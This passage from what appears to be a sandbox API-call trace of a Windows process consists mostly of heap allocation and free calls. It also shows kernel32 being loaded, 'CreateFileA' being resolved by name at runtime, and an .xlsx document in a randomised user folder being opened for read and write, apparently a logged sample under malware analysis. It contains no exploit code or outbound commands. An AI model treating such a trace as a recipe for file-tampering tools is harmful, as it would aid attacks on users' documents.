dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.804] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.807] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8897f0 [0036.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8897f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.807] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0036.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8897f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.808] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0036.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0036.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab260 [0036.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", cchWideChar=63, lpMultiByteStr=0x7ab260, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", lpUsedDefaultChar=0x0) returned 63 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.808] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmd_cmune5hcq1ezk.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7e) returned 0x7d5bb8 [0036.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=63, lpWideCharStr=0x7d5bb8, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx") returned 63 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.811] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 